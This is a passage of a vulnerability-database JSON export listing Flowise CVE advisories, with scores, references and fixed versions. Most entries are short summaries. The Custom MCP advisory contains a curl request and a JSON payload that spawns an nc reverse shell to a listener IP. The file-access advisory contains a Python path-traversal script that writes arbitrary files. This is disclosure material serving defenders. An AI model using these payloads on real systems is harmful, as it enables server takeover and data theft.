"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-48m6-ch88-55mj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41267", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41267" }, { "reference_url": "https://github.com/advisories/GHSA-48m6-ch88-55mj", "reference_id": "GHSA-48m6-ch88-55mj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-48m6-ch88-55mj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41267", "GHSA-48m6-ch88-55mj" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d4wa-szeh-43ab" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71348?format=api", "vulnerability_id": "VCID-dtss-epth-z7fh", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.0.13, Flowise exposes an HTTP Node in AgentFlow and Chatflow that performs server-side HTTP requests using user-controlled URLs. By default, there are no restrictions on target hosts, including private/internal IP ranges (RFC 1918), localhost, or cloud metadata endpoints. This enables Server-Side Request Forgery (SSRF), allowing any user interacting with a publicly exposed chatflow to force the Flowise server to make requests to internal network resources that are inaccessible from the public internet. This vulnerability is fixed in 3.0.13.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31829", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.27704", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31829" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31829", "reference_id": "CVE-2026-31829", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31829" }, { "reference_url": "https://github.com/advisories/GHSA-fvcw-9w9r-pxc7", "reference_id": "GHSA-fvcw-9w9r-pxc7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fvcw-9w9r-pxc7" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7", "reference_id": "GHSA-fvcw-9w9r-pxc7", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-11T14:15:56Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-31829", "GHSA-fvcw-9w9r-pxc7" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dtss-epth-z7fh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80899?format=api", "vulnerability_id": "VCID-dzed-27rk-3qav", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41273", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43534", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41273" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41273", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41273" }, { "reference_url": "https://github.com/advisories/GHSA-6f7g-v4pp-r667", "reference_id": "GHSA-6f7g-v4pp-r667", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6f7g-v4pp-r667" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667", "reference_id": "GHSA-6f7g-v4pp-r667", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:33:20Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41273", "GHSA-6f7g-v4pp-r667" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dzed-27rk-3qav" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80615?format=api", "vulnerability_id": "VCID-e65e-s5sd-kuhp", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41272", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00083", "scoring_system": "epss", "scoring_elements": "0.24258", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41272" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41272", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41272" }, { "reference_url": "https://github.com/advisories/GHSA-2x8m-83vc-6wv4", "reference_id": "GHSA-2x8m-83vc-6wv4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2x8m-83vc-6wv4" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4", "reference_id": "GHSA-2x8m-83vc-6wv4", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:18:28Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41272", "GHSA-2x8m-83vc-6wv4" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e65e-s5sd-kuhp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81149?format=api", "vulnerability_id": "VCID-ejdc-j73x-jydk", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41269", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00146", "scoring_system": "epss", "scoring_elements": "0.34734", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41269" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41269", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41269" }, { "reference_url": "https://github.com/advisories/GHSA-rh7v-6w34-w2rr", "reference_id": "GHSA-rh7v-6w34-w2rr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rh7v-6w34-w2rr" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr", "reference_id": "GHSA-rh7v-6w34-w2rr", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:21:08Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41269", "GHSA-rh7v-6w34-w2rr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ejdc-j73x-jydk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360546?format=api", "vulnerability_id": "VCID-fje6-knjc-nfgf", "summary": "Flowise has unsandboxed remote code execution via Custom MCP\n### Summary\nThe Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the `FLOWISE_USERNAME` and `FLOWISE_PASSWORD` environment variables.\n\nThis combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.\n\n### PoC\n1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as `npx`, `pnpm`, etc):\n https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker\n\n2. Create a new file named `payload.json` somewhere in your machine, with the following data:\n```\n{\"inputs\":{\"mcpServerConfig\":{\"command\": \"touch\",\"args\": [\"/tmp/yofitofi\"]}},\"loadMethod\":\"listActions\"}\n```\n\n3. Send the following `curl` request using the `payload.json` file created above with the following command:\n```\ncurl -XPOST -H \"x-request-from: internal\" -H \"Content-Type: application/json\" --data @payload.json \"http://localhost:3000/api/v1/node-load-method/customMCP\"\n```\n\n4. Observe that a new file named `yofitofi` is created under `/tmp` folder.\n\nSimilarily, we can use the same technique to gain a reverse shell using the built-in `nc` utility with the following JSON payload:\n```\n{\"inputs\":{\"mcpServerConfig\":{\"command\": \"nc\",\"args\": [\n\"<LISTENER_IP_ADDRESS>\",\"<LISTENER_PORT>\",\"-e\",\"/bin/sh\"\n]}},\n\"loadMethod\":\"listActions\"}\n```\n\n\n\n### Impact\nRemote code execution\n\n### Mitigation\n- Consider adding additional access controls surronding sensitive functionality such as Custom MCP, e.g. only users with \"Admin\" roles will be able to configure new Custom MCPs within the platform.\n- Consider disabling the Custom MCP feature by default, with a clear disclaimer for end users on the implications of enabling this feature.\n- Consider running Custom MCPs within a sandboxed environment\n\n### Credit\nThe vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/ac7cf30e019cde54905bf09b5d3fe1c6ba42f9b9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/ac7cf30e019cde54905bf09b5d3fe1c6ba42f9b9" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5201", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/5201" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6933-jpx5-q87q", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6933-jpx5-q87q" }, { "reference_url": "https://github.com/advisories/GHSA-6933-jpx5-q87q", "reference_id": "GHSA-6933-jpx5-q87q", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-6933-jpx5-q87q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "GHSA-6933-jpx5-q87q" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fje6-knjc-nfgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/84126?format=api", "vulnerability_id": "VCID-fu6t-9dk4-jbh9", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization from the “Custom MCP” configuration in http://localhost:3000/canvas - where any user can add a new MCP, when doing so - adding a new MCP using stdio, the user can add any command, even though your code have input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands - these commands, for example \"npx\" can be combined with code execution arguments (\"-c touch /tmp/pwn\") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40933", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22424", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40933" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40933", "reference_id": "CVE-2026-40933", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40933" }, { "reference_url": "https://github.com/advisories/GHSA-c9gw-hvqq-f33r", "reference_id": "GHSA-c9gw-hvqq-f33r", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c9gw-hvqq-f33r" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r", "reference_id": "GHSA-c9gw-hvqq-f33r", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r" }, { "reference_url": "https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem", "reference_id": "mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/" } ], "url": "https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem" }, { "reference_url": "https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp", "reference_id": "the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/" } ], "url": "https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-40933", "GHSA-c9gw-hvqq-f33r" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fu6t-9dk4-jbh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360549?format=api", "vulnerability_id": "VCID-g7y6-euhd-jqhh", "summary": "Flowise has arbitrary file access due to missing chat flow id validation\n### Summary\n\nMissing chat flow id validation allows an attacker to access arbitrary file.\n\n### Details\n\nCommit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.\n\n**Case 1**\n\nWhen creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.\n\n```typescript\nexport const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {\n // ...\n } else {\n const dir = path.join(getStoragePath(), chatflowid) // path traversal here\n if (!fs.existsSync(dir)) {\n fs.mkdirSync(dir, { recursive: true })\n }\n\n const splitDataURI = fileBase64.split(',')\n const filename = splitDataURI.pop()?.split(':')[1] ?? ''\n const bf = Buffer.from(splitDataURI.pop() || '', 'base64')\n const sanitizedFilename = _sanitizeFilename(filename)\n\n const filePath = path.join(dir, sanitizedFilename)\n fs.writeFileSync(filePath, bf)\n fileNames.push(sanitizedFilename)\n return 'FILE-STORAGE::' + JSON.stringify(fileNames)\n }\n}\n```\n\n**Case 2**\n\nWhen downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.\n\nNote that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.\n\n### PoC\n\nLaunch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.\n\n```python\nimport requests\nimport json\nurl = \"http://localhost:8080/api/v1/chatflows\"\nheaders = {\"x-request-from\": \"internal\"}\nnodedata = {\n \"category\" : \"Document Loaders\",\n \"inputs\" : {\n \"key\" : \"data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn\"\n }\n}\nflownode = {\n \"id\" : \"a\",\n \"data\" : nodedata\n}\nflowdata = {\n \"nodes\" : [flownode],\n \"edges\" : [],\n \"viewport\" : {\n \"x\" : 1,\n \"y\" : 1,\n \"zoom\" : 1\n }\n}\ndata = {\n \"id\" : \"../../../../../tmp\",\n \"name\" : \"name\",\n \"flowData\" : json.dumps(flowdata)\n}\nres = requests.post(url, json=data, headers=headers)\n```\n\n### Impact\n\n1. Arbitrary file read / write\n2. Remote Code Execution\n3. Data loss", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": 